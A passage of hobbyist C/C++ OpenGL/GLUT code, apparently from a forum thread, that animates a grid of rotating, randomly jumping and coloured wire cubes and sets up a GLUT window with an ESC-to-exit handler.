glutWireCube(2.0);
}
}
}
if (ullCurrentTicks > 18 && ullCurrentTicks <= 25)
{
int i = 0;

for ( int Ix = 0 ; Ix <= 60 ; Ix += 4)
{
for(int Iy = 0 ; Iy <= 60 ; Iy += 4)
{
fJump = (((rand() % 8) + 1 ));
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef((fKoordSize/2 * (-1)) + Ix,(fKoordSize/2 * (-1)) + Iy,fJump);
glRotatef(fRotation[i],1.0f,1.0f,0.0f);
glutWireCube(2.0);

fRotation[i++] += 1.0f;
}
}
}
if (ullCurrentTicks > 25 && ullCurrentTicks <= 32)
{
int i = 0;

for ( int Ix = 0 ; Ix <= 60 ; Ix += 4)
{
for(int Iy = 0 ; Iy <= 60 ; Iy += 4)
{
fJump = (((rand() % 8) + 1 ));
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);

switch ((((rand() % 30) + 10) /10))
{
case 1:
glColor3f(0.5f,0.0f,0.0f);
break;
case 2:
glColor3f(0.0f,0.5f,0.0f);
break;
case 3:
glColor3f(0.0f,0.0f,0.8f);
break;
}

glTranslatef((fKoordSize/2 * (-1)) + Ix,(fKoordSize/2 * (-1)) + Iy,fJump);
glRotatef(fRotation[i],1.0f,1.0f,0.0f);
glutWireCube(2.0);

fRotation[i++] += 1.0f;
}
}
}
if(ullCurrentTicks > 32)
{

}
glutSwapBuffers();
}

void processNormalKeys(unsigned char key, int x, int y) {
if (key == 27) // Exit on ESC
{
exit(0);
}
}

void main(int argc, char **argv) {

ExecutionTime = time(NULL);


glutInit(&argc, argv);
glutInitDisplayMode(GLUT_DEPTH | GLUT_DOUBLE | GLUT_RGBA);
glutInitWindowPosition(100,100);
glutInitWindowSize(320,320);
glutCreateWindow("OpenGL Tests");

glutDisplayFunc(renderScene);
glutReshapeFunc(changeSize);
glutIdleFunc(renderScene);

glutKeyboardFunc(processNormalKeys);

glutMainLoop();
}
~0

Pages: [1] 2